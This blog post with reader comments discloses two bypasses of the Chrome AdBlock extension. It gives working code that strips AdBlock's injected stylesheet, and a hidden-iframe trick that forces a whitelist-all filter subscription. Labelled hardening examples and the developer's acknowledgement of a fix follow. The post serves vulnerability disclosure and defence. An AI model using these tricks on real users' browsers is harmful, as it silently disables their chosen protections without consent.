Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking series (see part 1 and 2), this time I'd like to draw your attention to the oh-so-popular AdBlock extension. It has over a million users, is being actively maintained and is a great piece of software (heck, even I use it!). However, due to how Chrome extensions work in general, it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. Both are exploitable in the newest version, 2.5.22.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.


If you want to analyze the extension code yourself, use my download script to fetch the addon from the Chrome Web Store and read on:
// you need PHP with openssl extension and command line unzip for this
$ mkdir addons
$ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlock
Of course, you don't need to, but if you don't it makes me sad :/

Small bypass - disabling filter injection

Like many Chrome extensions, AdBlock alters the content of the web pages you see by modifying the page DOM. For example, it injects a <link rel=stylesheet> that hides all ads with CSS. This all happens in adblock_start_common.js:
function block_list_via_css(selectors) {
  var d = document.head || document.documentElement;
  // Issue 6480: inserting a <style> tag too quickly made it be ignored.
  // Use ABP's approach: a <link> tag that we can check for .sheet.
  var css_chunk = document.createElement("link");
  css_chunk.type = "text/css";
  css_chunk.rel = "stylesheet";
  css_chunk.href = "data:text/css,";
  d.insertBefore(css_chunk, null);
  // ... and fill the node contents later on
}
Sweet & cool, right? But the problem is that websites have tons of ways to defend themselves from being altered. After all, it's their DOM you're messing with. So the easiest bypass is to listen for anyone adding a stylesheet and remove it:
function block(node) {
    if (   (node.nodeName == 'LINK' && node.href == 'data:text/css,') // new style
        || (node.nodeName == 'STYLE' && node.innerText.match(/^\/\*This block of style rules is inserted by AdBlock/)) // old style
        ) {
        // drop AdBlock's stylesheet before it hides anything
        node.parentNode.removeChild(node);
    }
}

document.addEventListener("DOMContentLoaded", function() {
    document.addEventListener('DOMNodeInserted', function(e) {
        // disable blocking styles inserted by AdBlock
        block(e.target);
    }, false);
}, false);
As a result the stylesheet is removed and the ads are not hidden anymore. See the demo. Note that this only defeats the element-hiding (CSS) rules: requests that AdBlock cancels before they ever leave the browser are not affected, which is why this is just a small bypass. This is similar to how many Chrome extensions work. Extension authors should remember that you can't rely on the page DOM being cool with you; the page can actively undo your modifications. In other words, it's not your backyard, behave.
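What a hostile page cannot undo is a request that never left the browser. As an added example (my code, not AdBlock's and not part of the original post), here is a minimal blocking listener on chrome.webRequest.onBeforeRequest driven by a constructed three-rule filter list. The filter syntax is a small hand-written subset of the Adblock Plus syntax (||host^ and plain substrings); the extension would need the webRequest and webRequestBlocking permissions plus host permissions in its manifest.

```javascript
// Added example, not AdBlock's code: block ad requests at the network
// layer with chrome.webRequest, where a page's DOM tricks cannot reach.
// FILTERS is a constructed three-rule sample list in a hand-written
// subset of Adblock Plus syntax:
//   ||host^   matches any request to host or one of its subdomains
//   anything else is a plain substring match on the full URL
const FILTERS = ["||ads.example^", "||tracker.example^", "/banner/"];

function compileFilter(text) {
  if (text.startsWith("||")) {
    const host = text.slice(2).replace(/\^$/, "").toLowerCase();
    return function (url) {
      let hostname;
      try { hostname = new URL(url).hostname.toLowerCase(); } catch (e) { return false; }
      return hostname === host || hostname.endsWith("." + host);
    };
  }
  return function (url) { return url.includes(text); };
}

const COMPILED = FILTERS.map(compileFilter);

// True when at least one filter matches the request URL.
function shouldBlock(url) {
  return COMPILED.some(function (match) { return match(url); });
}

// Blocking listener: returning {cancel: true} means the request is never
// sent, so there is no response, no script and nothing for the page to undo.
function onBeforeRequest(details) {
  return { cancel: shouldBlock(details.url) };
}

// Registration, only when running as an extension background page. The
// manifest needs the "webRequest" and "webRequestBlocking" permissions
// plus host permissions for the URLs to be filtered.
if (typeof chrome !== "undefined" && chrome.webRequest) {
  chrome.webRequest.onBeforeRequest.addListener(
    onBeforeRequest,
    { urls: ["<all_urls>"] },
    ["blocking"]
  );
}
```

Element hiding stays useful for ads that are inline in the page's own HTML, but that is exactly the part a hostile page can undo, so treat it as cosmetic. In Manifest V3 the blocking form of webRequest is no longer available to ordinary extensions and declarativeNetRequest takes its place; the principle, filter before the bytes arrive, is the same.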

Total bypass - Disable AdBlock for good

The previous one was child's play, but the real deal is here. Any website can detect whether you're using Chrome AdBlock and disable it completely for the future. This is possible thanks to a vulnerability in the filter subscription page. Subscribing works by launching the chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html page. Here's what happens:
// pages/subscribe.js
  //Get the URL
  var queryparts = parseUri.parseSearch(document.location.search);
  //Subscribe to a list
  var requiresList = queryparts.requiresLocation ?
      "url:" + queryparts.requiresLocation : undefined;
  // ... the request below is then sent to the background page (the call itself is cut off here)
      {id: 'url:' + queryparts.location, requires:requiresList});

First, the query string of the page is parsed and then a subscription request carrying the location parameter is sent to the extension's background page. So when the extension launches subscribe.html?location=http://example.com, this subscribes to the filter list at http://example.com.

All neat, but what many extension authors don't realize is that ordinary web pages can load your extension's resources too, chrome-extension:// URLs included. In the future extension authors will be able to limit this with web_accessible_resources in the manifest, but in the current Chrome 17 it's not possible.

So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a list that whitelists everything:
<iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe>
var addon_id = 'gighmmpiobklfepjocnamgkkbiglidom'; // AdBlock's extension ID
// list.txt is the whitelist-all filter list served next to the demo page
document.getElementById('abp').src = 'chrome-extension://' + addon_id + '/pages/subscribe.html?location=' + location.href.replace('disable.html', 'list.txt');
See for yourself in the demo.
To re-enable AdBlock go to the extension's settings, choose the Filter Lists tab and disable the last added filter list (the koto.github.com one).

How to fix this in the code? Don't let the URL of an extension page trigger a privileged action on its own: anyone who can frame the page controls its query string. Parse the parameters, show the user what is about to happen and act only on an explicit click inside the page (and, once web_accessible_resources is available, don't expose pages/subscribe.html to the web at all).
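One way to harden subscribe.html along those lines, as an added example that is not AdBlock's code and not part of the original post: validate the location parameter, refuse to act when the page is framed (the demo loads it in a hidden <iframe>), and make the background page accept only requests a user has confirmed with a click inside the extension page. The function names, the confirmed flag and the subscribe-button element id are this example's own assumptions.

```javascript
// Added example (not AdBlock's code): hardened handling of
// pages/subscribe.html?location=<list url>&requiresLocation=<list url>.
// Function names, the "confirmed" flag and "subscribe-button" are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Accept only plain http(s) URLs; chrome-extension:, data:, javascript:
// and URLs carrying credentials are rejected.
function validateListUrl(raw) {
  let u;
  try { u = new URL(raw); } catch (e) { return null; }
  if (!ALLOWED_SCHEMES.has(u.protocol)) return null;
  if (u.username || u.password) return null;
  return u.href;
}

// Parse the query string into a *pending* request. Nothing is subscribed yet.
function parseSubscribeQuery(search) {
  const params = new URLSearchParams(search);
  const location = params.get("location");
  if (location === null) return null;
  const listUrl = validateListUrl(location);
  if (listUrl === null) return null;
  let requires;
  const requiresLocation = params.get("requiresLocation");
  if (requiresLocation !== null) {
    const req = validateListUrl(requiresLocation);
    if (req === null) return null;
    requires = "url:" + req;
  }
  return { id: "url:" + listUrl, requires: requires, confirmed: false };
}

// A legitimately launched subscribe page is a top-level tab. The bypass
// loads it inside a hidden <iframe>, so refuse to do anything when framed.
function openedInFrame(win) {
  return win.top !== win;
}

// Called from the click handler of a visible "Subscribe" button.
function confirmSubscription(pending) {
  return Object.assign({}, pending, { confirmed: true });
}

// Background-page side: only a confirmed, well-formed request is acted on.
function backgroundAcceptSubscription(request) {
  const listId = /^url:https?:\/\//;
  if (!request || request.confirmed !== true) return false;
  if (typeof request.id !== "string" || !listId.test(request.id)) return false;
  if (request.requires !== undefined && !listId.test(request.requires)) return false;
  return true;
}

// Wiring inside the extension page (only runs in a browser).
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const pending = openedInFrame(window) ? null : parseSubscribeQuery(window.location.search);
  const button = document.getElementById("subscribe-button"); // assumed button id
  if (pending && button) {
    button.addEventListener("click", function () {
      // chrome.extension.sendRequest in Chrome 17; the background page runs
      // backgroundAcceptSubscription on what it receives.
      chrome.runtime.sendMessage(confirmSubscription(pending));
    });
  }
}
```

The framing check alone already defeats the demo above, but it is the confirmation click that removes the root cause: the URL no longer performs the action, the user does.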


r9s said...

Nice job.

pogue972 said...

Have you let the author of Adblock know about the sploits? I don't know coding, so my questions may be stupid. But is this more of a Chrome problem, an extension problem (in general), or more like an advertiser cat-vs-mouse type of thing?

Btw, there is an extension (you may or may not be aware of/interested in) for Chrome that's kind of supposed to work like NoScript for Firefox, called NoScript, but it's really, really early in development and kind of breaks everything. https://code.google.com/p/scriptno/

Zzii said...

And Firefox's Adblock is not exploitable because it uses browser-level filters, something Chrome doesn't let you do.

RJ said...

Great article!

michalstanko said...

Thanks for the article, it's very interesting.

Anyway, the best adblock you can have is turning plug-ins (Flash) off, which is super easy in Opera, easy in Chrome, and possible in Firefox with Flashblock (there might be an easier way I don't know about). And then whitelist sites like Gmail, YouTube, Google Maps or Dropbox, which use Flash for something useful.

Wladimir Palant said...

Nice vulnerability you found there. Just a note: Adblock Plus for Chrome is not affected, only Adblock. As to CSS tricks - yes, that's a Chrome limitation and not something that extension authors can currently fix (Adblock Plus for Firefox is fine).

kkotowicz said...

Yup, we have to wait for webRequest ( http://code.google.com/chrome/extensions/trunk/webRequest.html ) until real ad blocking is supported, so I consider the first vulnerability just a sweet, interesting trick. But you should fix the second one nonetheless ;)

kkotowicz said...

Sorry, I confused the extensions - so many AdBlocks to choose from ;) I've already contacted Michael about the issues.

Wladimir Palant said...

Yes, it is confusing. Wasn't my idea to name a competing extension "Adblock".

Anyway, I think that Adblock Plus is completely waterproof now. Web pages can no longer mess with extension pages, not even theoretically.

Michael Gundlach said...

Thanks for the heads up, Krzysztof.  The next release of AdBlock will fix the second vulnerability.  As Wladimir mentioned, the first only prevents hiding rules from working, though blocking will still work.

James Edward Lewis said...

It's ScriptNo, and once you start Trusting a few sites it doesn't seem to break anything anymore; in this respect it is like NoScript's default setup. Also it's fairly mature by now, having switched over to using the ContentSettings and WebRequest APIs available with Chrome 17.

It doesn't, however, have some of the more advanced functionality of NoScript, like surrogate scripts, the XSS filter, or the Application Boundaries Enforcer, and it also doesn't block plugins (but the click-to-play flag is available for that, and Chrome blocks most plugins by default anyway) or frames (but Better Popup Blocker works well for that).

EliSklar said...

"After all, it's their DOM your messing with"
I'm not usually a grammar nazi, but this "your" just makes me cringe.

kkotowicz said...

Agrh, fixed, thanks!

Marshal Walker said...

Thanks for telling all the spammers

Anonim said...

Doesn't work on AdBlock Plus ;D



I don't want sex ads on my wall on Pinterest and AdBlock was working perfectly; now it's not and they are back. I want them off. It's my Pinterest account and I have thousands of followers. I don't really want to see "dirty Derik cums for you" on my wall! I'm pretty pissed. How do I get it off my walls? Disgusted!

Noreply said...

"After all, it's their DOM you're messing with"

On their server it is. In my cache it is MINE to alter as I please for my selective viewing.

HumminGly said...

Loopback-proxy ad blocking is not affected. AdBlock (Plus) ought to offer this model as an alternative. xulrunner?

[at] kotowicz : ScriptNo (chromium)

HumminGly said...

" a advertiser cat vs mouse type of thing?"

Guess who always wins?

(hint: not the ad servers)

Nico said...

Does this still work?
